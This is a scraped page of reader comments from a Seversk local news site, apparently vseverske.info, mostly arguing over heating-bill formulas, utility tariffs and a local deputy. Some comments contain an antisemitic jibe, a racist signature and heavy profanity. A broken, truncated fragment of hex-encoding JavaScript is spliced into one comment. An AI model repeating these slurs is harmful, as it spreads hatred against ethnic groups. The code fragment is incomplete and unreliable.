Последние комментарии:

05.07.2025 11:26 написал Set
28.06.2025 11:37 написал tourson
15.06.2025 22:47 написал барыга
11.06.2025 22:54 написал tourson
11.06.2025 22:53 написал tourson
11.06.2025 22:49 написал tourson
10.06.2025 22:52 написал барыга
11.03.2025 18:05 написал elandrian
15.02.2025 20:28 написал venera
11.02.2025 09:10 написал venera
29.01.2025 09:06 написал sprinter
21.01.2025 21:13 написал alex33kaw
15.01.2025 13:22 написал ponni
15.01.2025 12:54 написал sprinter
15.01.2025 12:54 написал sprinter

Комментарий № 153076: Северчанка Наталья Савловец стала «Миссис Томск- 2016»

Написал: Гайзенберг

 в рот мне ноги lol 

да я в абсенте симпотичнее видел lol

Комментарий № 153075: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: RealTransHair

PeterThePig,

блогер Александр Примаченко


какой портал, такие и блогеры  


Вот уж кто прав так это ты дружище. wink 

Комментарий № 153074: От идеи к действию. AtomКвест

Написал: npocTo_BURLIK
сокращение дикое , они пиарятся какой то х....й

лучше бы написали сколько они народу выкинут на улицу в этом году ...  

Комментарий № 153073: Просьба откликнуться очевидцев!

Написал: HaTaJlu
Почти год прошел. Раньше то нельхя было спросить?

Комментарий № 153072: Северчанка Наталья Савловец стала «Миссис Томск- 2016»

Написал: Destruction9090
Поздравляю всю их родню!!!

Комментарий № 153071: Волчица Ночка стала первой красой зоопарка

Написал: intelligent
Мой голос был отдан за игуану. Они все по-своему красивые, и все достойны комфортного существования и вкусного питания. Просьба к зоопарку - поощрить всех участников чем-нибудь вкусным или игрушкой в вольер.

Комментарий № 153070: Медиа-центр «ART LEGION» предлагает музыкальное сопровождение мероприятий

Написал: intelligent
Цитата: ART_LEGION
А образование у нас такое,


Вашего образования не хватило, чтобы перевести с иностранного слово "media". При чем тут медиа-центр и ваша деятельность? Назвались по принципу  - что вижу, то пою. Так, судя по всему, и плывет ваш корабль, с кривым названием. fellow

Комментарий № 153069: Платить за отопление будем реже, но больше

Написал: intelligent
installet,

Если в вашем доме нет офисов и магазинов на первом этаже, тогда нет и нежилых помещений. Поэтому потребленное тепло делят вам только на квартиры, и это правильно.

Не поддавайтесь панике, которую намеренно устравивают известные всем в городе провокаторы. А лучше обратитесь в ваше ЖЭУ с запросом, о площади жилых и нежилых помещений. Почти все УК по своей халатности пользуются устаревшими и некорректными данными, причем всегда - не в пользу собственников.

Пусть ваша управляющая компания даст официальный ответ на бумаге, и вы сможете проверить правильность начислений по приведенной вами ниже формуле самостоятельно - и по своей квартире, и по дому в целом.

Комментарий № 153068: От идеи к действию. AtomКвест

Написал: Roman
СХК давно ничего не образует
 

Комментарий № 153067: Просьба откликнуться очевидцев!

Написал: Tharus
Тогда крышу сорвало с одного из кооперативов. Машину попалам разрезало, человек чудом остался жив.


--------------------
Я старый пират и не знаю слов лицензионного соглашения!..

Комментарий № 153066: Платить за отопление будем реже, но больше

Написал: лавандос
installet,
Так  оно так и считают. И проблема лишь в том, что некоторые оскорбленные и к ним прикнувшие под словом "НЕЖИЛЫЕ" подразумевают все оставшиеся от квартир (!) площади. Хотя это две большие разницы: Нежилые-это площади,находящиеся у кого-то в собственности и имеющие конкретного потребителя услуги. По сути те же самые жилые. А вот ОБЩИЕ-это и есть общие( Подъезды,подвалы,и проч, где нет собственника,ну или арендатора ,на худой конец, или пользователя, если смущает  само слово "собственность".

Комментарий № 153065: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Spamer
Сколько можно этого дрища пиарить? Что то полезное для Северска сделал? Обычное трепло!!!

Комментарий № 153064: Волчица Ночка стала первой красой зоопарка

Написал: Санёк Северский
волчица Ночка-не мэра ли дочка... winked 

Комментарий № 153062: Платить за отопление будем реже, но больше

Написал: installet

где:
- объем (количество) потребленной за расчетный период тепловой энергии, определенный по показаниям коллективного (общедомового) прибора учета тепловой энергии, которым оборудован многоквартирный дом. В случаях, предусмотренных пунктами 42(1) и 59 Правил, для расчета размера платы за коммунальные услуги используется объем (количество) коммунального ресурса, определенный в соответствии с положениями указанного пункта;

(в ред. Постановления Правительства РФ от 14.02.2015 № 129)
- общая площадь i-го жилого или нежилого помещения;
- общая площадь всех жилых и нежилых помещений многоквартирного дома;
- тариф на тепловую энергию, установленный в соответствии с законодательством Российской Федерации.
(п. 3 в ред. Постановления Правительства РФ от 16.04.2013 № 344)

ВОТ ПУСТЬ ТАК И СЧИТАЮТ!!!

Комментарий № 153061: Платить за отопление будем реже, но больше

Написал: installet

Приложение № 2 
к Правилам предоставления 
коммунальных услуг собственникам 
и пользователям помещений 
в многоквартирных домах 
и жилых домов

Расчет размера платы за коммунальные услуги

Список изменяющих документов
(в ред. Постановлений Правительства РФ от 16.04.2013 № 344,
от 14.02.2015 № 129)

Размер платы за коммунальную услугу по отоплению в i-м не оборудованном индивидуальным или общим (квартирным) прибором учета тепловой энергии жилом или нежилом помещении в многоквартирном доме, который оборудован коллективным (общедомовым) прибором учета тепловой энергии и в котором не все жилые и нежилые помещения оборудованы индивидуальными (или) общими (квартирными) приборами учета тепловой энергии, согласно пунктам 42(1) и 43 Правил определяется по формуле 3:

Комментарий № 153060: Платить за отопление будем реже, но больше

Написал: installet
Постановление Правительства Российской Федерации от 06 мая 2011 года № 354 
«О предоставлении коммунальных услуг собственникам и пользователям помещений в многоквартирных домах и жилых домов»

Относительно начисления платы в Вашем жилом помещении - пункт 42(1), 53 ПП № 354:

В многоквартирном доме, который оборудован коллективным (общедомовым) прибором учета тепловой энергии и в котором не все жилые или нежилые помещения оборудованы индивидуальными и (или) общими (квартирными) приборами учета (распределителями) тепловой энергии, размер платы за коммунальную услугу по отоплению в жилом помещении определяется в соответствии с формулой 3 приложения N 2 к настоящим Правилам исходя из показаний коллективного (общедомового) прибора учета тепловой энергии.

 

Комментарий № 153059: Платить за отопление будем реже, но больше

Написал: sim
Конечно же, за вычетом объёма тепловой энергии, который идёт на подогрев холодной воды.
Цифра в жировке, в нижней таблице справа, строка отопление, столбец квартиры и столбец объём ОПУ, цифры одинаковые. Эта цифра делится на площадь жилых и нежилых помещений в доме и умножается на площадь вашей квартиры. Получается объём тепловой энергии (Гкал), который вы должны оплатить (в жировке в таблице слева, строка отопление, первый столбец объём). Всё.

Комментарий № 153058: Платить за отопление будем реже, но больше

Написал: sim
Всю тепловую энергию, которую потребил дом, собственники оплачивают пропорционально площади своих помещений. 

Комментарий № 153057: Просьба откликнуться очевидцев!

Написал: avkvip777
- Кто свидетель?
- Я свидетель! А что случилось?

Комментарий № 153056: Медиа-центр «ART LEGION» предлагает музыкальное сопровождение мероприятий

Написал: ART_LEGION
Мефодий, приходите, покажем вам безымянный палец :D
 А образование у нас такое, которое позволяет заниматься музыкой так, чтобы людям нравилось, что подтверждает количество положительных отзывов о нашем творчестве. 
 

Комментарий № 153055: Платить за отопление будем реже, но больше

Написал: лавандос
bb,
очень вам сочувствую. Это честно,без сарказма. В том случае, если вы испытываете дискомфорт через это дело. Только не в том весь прикол -сколько и где стоит батарей  или труб.  Может быть даже ,- в вашем случае -это и немного сэкономит на  общем теплопотреблении,кстати. Весь сыр-бор вокруг того -кто же ,все-таки ,будет оплачивать то тепло, которое является общим,скажем так.
 Единственное ,чего точно не знаю, так это принцип,по которому технически рассчитывается это самое тепло. Ну не вникал  пока.  По разнице температур на входе и обратке,помноженное (?)или поделенноё  (?)на общую квадратуру? Остается надеяться, что с техникой будет все в порядке, хотя ,как показывает практика, тут очень часто все иначе.

Комментарий № 153054: Просьба откликнуться очевидцев!

Написал: Санёк Северский
они бы ещё ураганы 19 века вспомнили...

Комментарий № 153053: Северчанка Наталья Савловец стала «Миссис Томск- 2016»

Написал: Санёк Северский
Тогда уж миссис Северск...

Комментарий № 153052: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Мефодий
давно пора понять жиды пиарятся
хуцпа. 

Комментарий № 153051: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: difm
а можно уточнить, какие блоги ведет блогер Александр Примаченко? wink 

Комментарий № 153050: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: GyRzA_KPR
Давно пора эту тему закрыть.

Комментарий № 153049: Просьба откликнуться очевидцев!

Написал: Tofik
Видать хотят найти виновных и наказать))) lol


--------------------
Ещё 6 лет стабильности!

Комментарий № 153048: Платить за отопление будем реже, но больше

Написал: bb
Цитата: kvk
КТО ДОЛЖЕН ПЛАТИТЬ ЗА ЛЕСТНИЧНЫЕ КЛЕТКИ?? Так КТО??????    ДА НИКТО!!!  Не думал, что мой вопрос вызовит такую реакцию. Объясняю для особо одаренных - плата за ОДН (лестничные клетки и т.д.) по отоплению и водоотведению отменена еще в 2013г. ПП 344, в отличии ОДН на ГВС, ХВС и электроэнергию. Учите матчасть.
 
Какой там вообще мог быть ОДН? У на с в панельной пятиэтажке в подъезде одна батарея стоит - на втором этаже, на первом раньше стояла возле двери - теперь одна труба осталась. 

Комментарий № 153047: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Halif
Алексей Соколов, вам реально нечем заняться? или вы уже начали очередную предвыборную компанию? Мы ещё в предыдущем посте поняли, что Лёшка "Страус" Выборов - имбицилообразный индивид с искажённым восприятием реальности, но зачем же устраивать из этого откровенный цирк? Неужели поступок одного глупого человека заслуживает столько вашего внимания? Может это сведение личных счётов? Вот вы вроде успешный бизнесмен, хороший спортсмен и тренер, но сейчас уподобляетесь Лёшке Выборову в своих поступках.

Александр Примаченко, увиденная вами связь с национальными интересами США попахивает паранойей

Комментарий № 153046: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: 123456
Heon70,
полностью согласен. Но раз уж решили продлить тему, то хочу выразить благодарность депутату Выборову. Ведь именно благодаря его депутатской "здоровой иронии и юмору" стало видно, что на сайте наконец заработала антинецензурная цензура - столько забаненных зараз ни разу не видел, особое спасибо за "забаненного блогера". Дальнейших вам успехов в изучении различных опытов по выведению из себя ваших избирателей.
Надеюсь, что после проведения "разъяснительной работы" ни на страусе, ни в депутатском кресле еще долго сидеть не сможете, и решения на благо города будете принимать стоя.

Комментарий № 153045: Просьба откликнуться очевидцев!

Написал: alex33kaw
Проснулись. 

Комментарий № 153044: Тренажерный зал Триумф. 8 Марта - День открытых дверей для прекрасной половины человечества

Написал: Halif
Цитата: bb
Приколисты ))) конфетки после тренировки )))

Если бы вы имели когда-нибудь отношение к спорту, вас бы это не удивило

Комментарий № 153043: Тренажерный зал Триумф. 8 Марта - День открытых дверей для прекрасной половины человечества

Написал: Halif
Цитата: BVD
Для тренировочных залов главное содрать деньги с посетителей, а не здоровье людей, пора их всех позакрывать.

Логика первобытного человека

Комментарий № 153042: Барышня большая да громкоголосая

Написал: Rainbow
Ekaterina_T, мальчишкам свойственней быть крупными, а вот девочки редко такими рождаются

Комментарий № 153041: Просьба откликнуться очевидцев!

Написал: f1gv83
а об урагане 96 года не надо ничего вспомнить?

Комментарий № 153040: Просьба откликнуться очевидцев!

Написал: sergus
Чего? Какого урагана? Год назад? Это че стеб очередной чтоли или прикол такой?

Комментарий № 153039: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Heon70
а не много ли внимания? 

Комментарий № 153038: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: PeterThePig
блогер Александр Примаченко

какой портал, такие и блогеры fellow 

Комментарий № 153037: Платить за отопление будем реже, но больше

Написал: sim
лавандос,
не тратьте нервы, похоже, здесь тяжёлый случай smile 

Комментарий № 153036: Платить за отопление будем реже, но больше

Написал: xabk
Цитата: kvk
плата за ОДН (лестничные клетки и т.д.) по отоплению и водоотведению
 
Согласно п. 44, 47 Правил № 354 “плюсовой” объем на общедомовые нужды распределяется между потребителями пропорционально площади их помещений, “минусовой” - пропорционально площади (в отношении отопления) либо пропорционально количеству человек (в отношении холодного и горячего водоснабжения, водоотведения, электроснабжения, газоснабжения). 

Комментарий № 153035: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: гульнара
Дурдом какой то!!! Лишь отстой какой напечатать!

Комментарий № 153034: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: f1gv83
рекомендую в качестве лечения данного "депутата" закинуть на годик-другой в поселок Депутатский... пусть там кривляется перед камерой.

Комментарий № 153033: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Liberator
Достойная замена Шамину растет. Проказа - лицо народных неизбранников.

Комментарий № 153032: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: lusc
Рыба гниёт с головы, а эта рыба давно такая.Я про саму партию. Если у них Жирик клоун, то не удивидельно что в партии подобные отпрыски.))))

Комментарий № 153031: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Zeitgeist
Да и на других ресурсах,группах, общественность была возмущена,причем с других регионов писали возмущение к данному депутату.
Так что не нужно удивляться , город деградирует

Комментарий № 153030: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Destruction9090
Vseverske.info размещают некоторые статья даже не зная, правдивы они на самом деле или нет. Да потом  сами разберутся, так это или нет. Главное было над чем поржать и поумничать. Как модераторы фильтруют публикации, так и не понятно. Можно о каждом бреде отписывать сюда, почему нет.. а потом, да ..., ну так вышло

Комментарий № 153029: Антирейтинг vseverske.info возглавил депутат Думы ЗАТО Северск «верхом на страусе»

Написал: Destruction9090
Vseverske.info размещают некоторые статья даже не зная, правдивы они на самом деле или нет. Да потом  сами разберутся, так это или нет. Главное было над чем поржать и поумничать. Как модераторы фильтруют публикации, так и не понятно. Можно о каждом бреде отписывать сюда, почему нет.. а потом, да ..., ну так вышло

Комментарий № 153028: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: тайга
Цитата: Kapitalin-nike
Счетчик на трубе с горячей водой, входящей в дом, каким образом показывает расход именно тепла?
 Если тебе известны факты что на каком то доме вместо учетного узла стоит только один счетчик  на горячую воду и по нему насчитывают плату за отопление , то это со стороны РСО 100% мошенничество и этим должны и даже обязаны заниматься органы и суд .

 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 153027: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: тайга

Народ ,хватит уже фантазировать  , а если уж решили тему обсудить то хотя бы изучите ее ! 

На основании П П  № 400 от 01.11.14 (  и еще ряда ФЗ ) наш губер  издал распоряжение об установлении предельных индексов на повышение оплаты за ЖКХ  и там все четко прописано , повышение только 1 раз в год и только на 6, 4% (суммарно , а потому дифференцировано)  и ВСЕ (!)  И если кто повысит хоть на копейку больше , сразу маляву в надзорные органы !  Вот ссылка , обратите внимание на таблицы 1 и 2 , пункты  4 и 4  соответственно !

http://rec.tomsk.gov.ru/files/docs/2015/doc/345-r.pdf

 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 153026: Платить за отопление будем реже, но больше

Написал: лавандос
kvk,
Адреса,фамилии, явки..
Тех ,естесьно, кто отменил это все навсегда.
 Сцуко, ты -явление кривой интерпретации законов. Причем ,абсолютно безграмотное явление. Залогинься.а(?)

Комментарий № 153025: Опять водоканал.

Написал: лавандос
 с ржавой не наблюдал. Наблюдаю всю дорогу тоооооненькую струйку холодной. Ну просто как  у ооочень старенького дряхленького  дедушки, видимо.Ну ,такая вот ассоциация.  В сравнении с соетским напором раз в пять слабжее. Реальный такой напор на пол-шестого . Вялый,одним словом. Чуть приоткрой горячую и ...руки обжег ,сцука.

Комментарий № 153024: Опять водоканал.

Написал: Иваныч
комм.90 уже каждый день грязь идёт


--------------------
Работать негры !!!

Комментарий № 153023: Кто за открытие молочной кухни в нашем городе?

Написал: Kysik
Я За!!!

Комментарий № 153022: Платить за отопление будем реже, но больше

Написал: kvk
лавандос КТО ДОЛЖЕН ПЛАТИТЬ ЗА ЛЕСТНИЧНЫЕ КЛЕТКИ?? Так КТО??????    ДА НИКТО!!!  Не думал, что мой вопрос вызовит такую реакцию. Объясняю для особо одаренных - плата за ОДН (лестничные клетки и т.д.) по отоплению и водоотведению отменена еще в 2013г. ПП 344, в отличии ОДН на ГВС, ХВС и электроэнергию. Учите матчасть.

Комментарий № 153021: Сотни жителей Выборга вышли на митинг против роста цен на услуги ЖКХ.

Написал: SergeyHasan
Муниципальное предприятие «Единый расчетно-консультационный центр» (МП ЕРКЦ) было создано 01.02.2002г.
          Предприятие было преобразовано в Открытое акционерное общество «Единый расчетно-консультационный центр» (ОАО ЕРКЦ) 01.08.2014г. (Постановление Администрации ЗАТО Северск от 14.04.2014 года № 850 «О реорганизации МП ЕРКЦ путем преобразования в ОАО ЕРКЦ»).
          Предприятие было переименовано в Акционерное общество «Единый расчетно-консультационный центр» (АО ЕРКЦ) 26.01.2015г. (Постановление Администрации ЗАТО Северск от 16.12.2014 года № 3334 «О внесении изменений в Устав Открытого акционерного общества «Единый расчетно-консультационный центр»).
Виды деятельности:
разводилово горожан в г.Северске.
Директор АО ЕРКЦ: Атаманчук Наталья Сергеевна(барышня на побегушках у диде и шамшы)

Комментарий № 153020: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: SergeyHasan
как они нас любят во всех позах

Комментарий № 153019: Медиа-центр «ART LEGION» предлагает музыкальное сопровождение мероприятий

Написал: лавандос
vvm,
да, про звуковое образование. ну, Адоб аудишн освоен полностью наверняка)))

Комментарий № 153018: Медиа-центр «ART LEGION» предлагает музыкальное сопровождение мероприятий

Написал: лавандос
vvm,
Как положено -8 классов. Вишь как пишут:" подарить  своей слабой половинке"
  С музыкой и всем остальным уровень соответствующий.

Комментарий № 153017: Медиа-центр «ART LEGION» предлагает музыкальное сопровождение мероприятий

Написал: vvm
Образование какое у звукооператоров?

Комментарий № 153016: Платить за отопление будем реже, но больше

Написал: лавандос
kvk,
Ты правильно вопрос ставишь: КТО ДОЛЖЕН ПЛАТИТЬ ЗА ЛЕСТНИЧНЫЕ КЛЕТКИ?? Так КТО?????? Ты в натуре тупой ,что ли????????? Территория лестничных клеток и всех остальных общих помещений дома , для оплаты делится пропорционально занимаемым жилым и нежилым помещениям!!! Да толлько если ты их в знаменатель начнешь включать, то ты тем самым   этим помещениям выделяешь самостоятельную долю. . баля, я таких тугодумов редко встречал в жизни. И это после всего написанного  уже!!!

Комментарий № 153015: Платить за отопление будем реже, но больше

Написал: лавандос
installet,
Ну, во первых: тут -на сайте ты и есть ТЫ. Обезличенный ник "installet" и не более. А уж как мне обращаться на ты или на вы, -сути дела это не меняет и я к этому ну просто никак не отношусь и не имею какого-то бы ни было отношения.   Твой распухший гондурас меня мало инересует. И здесь я не правила хорошего (  в твоем понимании) тона отстаиваю и(или ) применяю, а обыкновенно спорю по сути.  Видимо ощущение своей неправоты свербит  и отсюда какие-то не по теме разговоры на предмет на ты,на вы. Сроду не считал хамством обращение на "ТЫ". Или где там хамство -то?  Или в том, ,что я, судя по  коментам,  нахожу, что некий  субъект под ником installet поверхностен  ?
Докажи обратное. Будь вдумчивым (ой) и излагай

Комментарий № 153014: Олег Первушин стал серебреным призером Чемпионата России по настольному теннису среди ветеранов

Написал: Skyrex
Kucheryava,
Так работа такая,что отсутствие на работе не скажется на работе

Комментарий № 153013: Тренажерный зал Триумф. 8 Марта - День открытых дверей для прекрасной половины человечества

Написал: bb
Приколисты ))) конфетки после тренировки )))

Комментарий № 153012: Зимний дрифт

Написал: YAVASTROY
ИЗ ЗА ТАКИХ МУДАКОВ С ВЫХЛОПОМ ОТ ДУТКИ, ПОЛ НОЧИ СЦУКА НЕМОГУ РЕБЕНКА УЛОЖИТЬ И НЕ Я ОДИН, ВСЕ КОЛЬЦО СЛЫШИТ!!!!

Комментарий № 153011: Платить за отопление будем реже, но больше

Написал: sim
Цитата: kvk
Конечно нужно делить на общую площадь всех помещений в доме.

Объясню на примере:
Дом, площадь жилых и нежилых помещений в котором составляет 3000 кв.м. Площадь лестничных клеток 250 кв.м. Дом потребил по показаниям ОПУ тепла 100 Гкал.
Поставим эти цифры в формулу:
100 Гкал х 3000 : 3000 х 1178.1 руб. = 117810 руб.
или, как предлагаете Вы:
100 Гкал х 3000 : 3250 х 1178.1 руб. = 108748 руб.
117810 - 108748 = 9062 руб.(стоимость объёма тепловой энергии на ОДН, который в этом случае  остаётся неоплаченным). Конкретно, это: 9062 руб. : 1178.1 руб. = 7.69 Гкал.

Комментарий № 153010: Платить за отопление будем реже, но больше

Написал: Kapitalin-nike
А ни у кого наличия мозга не хватило подумать о том, откуда эти мошенники берут все эти цифры? Может у нас в каждом доме стоят приборы учета именно расхода тепла? Счетчик на трубе с горячей водой, входящей в дом, каким образом показывает расход именно тепла? Все указанные выше цифры взяты с потолка, и поэтому какой смысл их вообще обсуждать?

Комментарий № 153009: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: Kapitalin-nike

А ни у кого наличия мозга не хватило подумать о том, откуда эти мошенники берут все эти цифры? Может у нас в каждом доме стоят приборы учета именно расхода тепла? Счетчик на трубе с горячей водой, входящей в дом, каким образом показывает расход именно тепла? Все указанные выше цифры взяты с потолка, и поэтому какой смысл их вообще обсуждать?

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 153008: В Лавке «КузнецовЪ» составят подарки от 100 рублей

Написал: Недовольный
Destruction9090,

Они еще дешевый бодяженый чай продают, выдавая его за элитный. Для большинства наверное это не заметно по причине неосведомленности. Одним словом лавка - на магазин это никак не тянет lol 

Комментарий № 153007: Благодаря помощи северчанки полицейские задержали подозреваемого в совершении грабежа

Написал: Завсегдатый
uncleandrew,
Ну надо хоть кому то просвещять некоторых :))).

Комментарий № 153006: Платить за отопление будем реже, но больше

Написал: kvk
installet  Я злобу в свой адрес встречаю со смехом. Я знаю, что зависть - признак успеха. С праздником Вас!!!

Комментарий № 153005: Платить за отопление будем реже, но больше

Написал: installet
лавандос,
Я Вам никогда не "ТЫ"кала и НЕ хамила. Так будте воспитанным человеком. И не Вам решать вопрос о моей грамотности. 
У них с капитальным ремонтом не получилось людей облапошить, так придумали новый способ "доить народ".

Комментарий № 153004: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: лавандос

на самом деле! К Северску ни одна цифра не подходит. Из тех, что сегодня. А тарифы уже давно "разрешено" два раза в год повышать,на основании нескольких закрнодательных актов. А вот распоряжением Правительства от  28 10.2015. на Томскую область "выделен" индекс 4.2%. Возможно это предварительная циферка на  1.01.2016 и в июле будет корректировка, но по всем признакам она в среднем по стране не превышает 7-9 %. То есть ,если внутри субъекта получается намного выше, то  нагибать нужно власть в субъекте.

Комментарий № 153003: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: kvk
Vitk  Внимательно читаем - конкретные цифры в рублях для Томска, не для Северска. Информация с сайта Департамента ЖКХ Томской области.

Комментарий № 153002: Платить за отопление будем реже, но больше

Написал: kvk
лавандос Я извиняюсь - кто должен платить за отопление лестничных клеток? Или это не общее имущество собственников помещений в доме? Конечно нужно делить на общую площадь всех помещений в доме. Что касается 01.072016г. то до указанной даты расчет по "факту" (за расчетный период - за конкретный месяц) НЕЗАКОНЕН!!! И РАСЧЕТ ДОЛЖЕН ПРОИЗВОДИТСЯ ПО ФОРМУЛЕ ПП 307. ЗДЕСЬ КОММ. № 81. Если внимательно посмотрите - формула расчета (7)  именно по приборам учета. Вы же предлагаете считать по не вступившему в законную силу документу?

Комментарий № 153001: С 1 июля тарифы на комуслуги в Томской области вырастут в среднем на 13 процентов.

Написал: Vitk
Человек с другой планеты! У нас таких цен нет! НОВОСТИ В ПЬЯНОМ БРЕДУ СОЧИНЯЕТЕ!?

Комментарий № 153000: Платить за отопление будем реже, но больше

Написал: sim
kvk,
считать по этой формуле можно, но формально эта формула относится к домам, в которых не все жилые и нежилые помещения оборудованы индивидуальными (или) общими (квартирными) приборами учета тепловой энергии.  А в Северске в большинстве домов во всех жилых помещениях отсутствуют индивидуальные приборы учёта тепловой энергии. Хотя бы формулировку нужно изменить. Как в первоначальной редакции:
"3. Размер платы за коммунальную услугу по отоплению в i-м не оборудованном индивидуальным или общим (квартирным) прибором учета тепловой энергии жилом или нежилом помещении в многоквартирном доме, который оборудован коллективным (общедомовым) прибором учета тепловой энергии и в котором во всех жилых и нежилых помещениях отсутствуют индивидуальные и общие (квартирные) приборы учета тепловой энергии, согласно пунктам 42 и 43 Правил определяется по формуле 3:"
Но формула в этой редакции была та, которую Вы привели:  P = Vd x Si : Sd x T
Зачем эти умники изменили  и формулу и категорию домов, по отношению к которым она применяется - непонятно.


Комментарий № 152999: Сотни жителей Выборга вышли на митинг против роста цен на услуги ЖКХ.

Написал: Kapitalin-nike

НЕ ПЛАТИТЬ ВОРАМ, ПО ЛИПОВЫМ СЧЕТАМ!                   Если откажется платить один квартиросъёмщик, то на него обрушится вся мощь репрессивного аппарата негодяев, а если не заплатит весь дом? А если перестанет платить ВЕСЬ ГОРОД, то что будет? Бомбардировки, как в Сирии?  Или в Москве обратят внимание и предпочтут убрать воров с Коммунны 51, чтобы не создавать прецедент, так как если перестанет негодяям платить вся страна, то сваливать по скорому придётся уже обитателям кремля!

Комментарий № 152998: Платить за отопление будем реже, но больше

Написал: лавандос
kvk,
Этот самый  п.6, на который ты все ссылаешься, гласит только об одном, что  с 1.о7. 2016, утрачивают силу те самые пп.15-28 "Правил расчета" И  пп .1-4 Приложения №2 к "Правилам". Но это не означает, что до утраты силы вышеназванных документов ,никто не имеет право вести расчет по показаниям общедомовых приборов потребления тепла , т.е. до 1.07.2016.
Ты, видимо ,прочитал первую и последнюю строчку,где слова "..утрачивают силу с 1.07.2016..",ну, и таким вот образом совместил, не вникая в суть этих всех-действительно   перезаумных "отмен "и "утрат силы".

Комментарий № 152997: Платить за отопление будем реже, но больше

Написал: лавандос
kvk,
Хоть слово  на предмет неотапливаемости помещений общего пользования я написал?  Повторюсь.: Эти самые помещения нельзя включать в знаменатель,по причинеотсутствия за ними стороннего потребителя,кроме тех, кто проживает или использует остальные (жилые и нежилые, в том числе выведенные из жилых) помещения. Они пропорционально распределяются между потребителями. И эту пропорцию возможно рассчитать ТОЛЬКО при определении доли каждого участника,путем ..да хоть той же прямой пропорцией ,хоть другими способами,используемыми в занимательной математике,что ,кстати, видимо, для задурманивания мозгов и придумали,используя все те хитровые*банные формулы.
 И вот такая формулировка, к которой и ты тяготеешь -
они делят не на общую площадь дома, как положено, а на общую жилую площадь в доме, вот поэтому и получились такие большие цыфры.

 это и есть запутанность мозга.

Комментарий № 152996: Сотни жителей Выборга вышли на митинг против роста цен на услуги ЖКХ.

Написал: SergeyHasan
в нашем городе это практически такое не возможно, нахер ни кому ничего не нужно

Комментарий № 152995: Платить за отопление будем реже, но больше

Написал: kvk
 sim На счет формул Вы правы, НО СТИТАТЬ ПО НЕЙ НУЖНО С 01 ИЮЛЯ 2016 ГОДА!!! НЕ ВЕРИТЕ МНЕ - КАК НА СЧЕТ ПРЕЗИДЕНТА РФ? ЧИТАЙТЕ ПП 354 ТЕКСТ САМОГО  ПОСТАНОВЛЕНИЯ ПУНКТ 6. НАД ПОДПИСЬЮ В. В. ПУТИНА!!!!!!!!  ЗДЕСЬ КОММ. № 85.

Комментарий № 152994: Опять водоканал.

Написал: SergeyHasan
пишите адреса где нефть

Комментарий № 152993: Депутат Лешка Выборов предложил решение проблемы импортозамещения и пробок на КПП с помощью страусов

Написал: dimasik2016

Комментарий удален администратором сайта. Пользователю бан на 30 дней.

Комментарий № 152992: Платить за отопление будем реже, но больше

Написал: sim

kvk,
а эта формула, которую я привёл, откуда?
Pi = Vd x Si : Sоб х Тт
а вот Ваша:
P = Vd x Si : Sd x T
как говорится, найдите два отличия wink




Комментарий № 152991: Платить за отопление будем реже, но больше

Написал: kvk
Млые,любимые женщины! С праздником! Я вдруг понял, почему "мужики" на сайте несут ахинею! Ни кому из них не знакомо Великое таинство рождения новой жизни кроме Вас! Вы всегда знаетевсе лучше нас, что нужно нам и это естественно и правильно! Простите нас за некомпетентность и тупость! Мы Вас очень любим и боготворим,в большенстве своем, желаем Вам всего .....! С праздником!!! лавандос Если Вы считаете помещения общего пользования(например подъезды) не отапливаемыми - Слава Вам!

Комментарий № 152989: Северск. Ремонт дорог 2015. Как это было.

Написал: f1gv83
10 тонн инновационного дорожного материала.

10 тонн какой-то дряни, оставшейся с ремонтов пригородных дорог... дай вам Боже, что нам негоже.... и тут Северск сразу все захапал! еще и по цене, видать, самого лучшего асфальта, да чтоб в несколько слоев

Комментарий № 152988: Северск. Ремонт дорог 2015. Как это было.

Написал: f1gv83
гы, что залатали на кольце говнищем этим - снова отлетело!
что латали на Ленина каждый день той осенью - снова отлетело, и еще больше дырки образовались! напротив Дельфина - провалы, напротив Царевского - провал, чуть дальше - вообще выбоины.
перекресток Ленина-Солнечная - вообще страх...

совсем уже людей за идиотов считают...

PS Это че, еще 10 лет ждать?! когда только "начнут" пробовать нормально делать?!

PPS дорога на объект построена хз в каких годах, там ни разу не перекладывали асфальт... и дорога никогда не знала соли и прочего. почему нельзя так в городе?
Диденко задали этот вопрос в прямом эфире - так его перекосило сразу, "вы ничего не понимаете!"

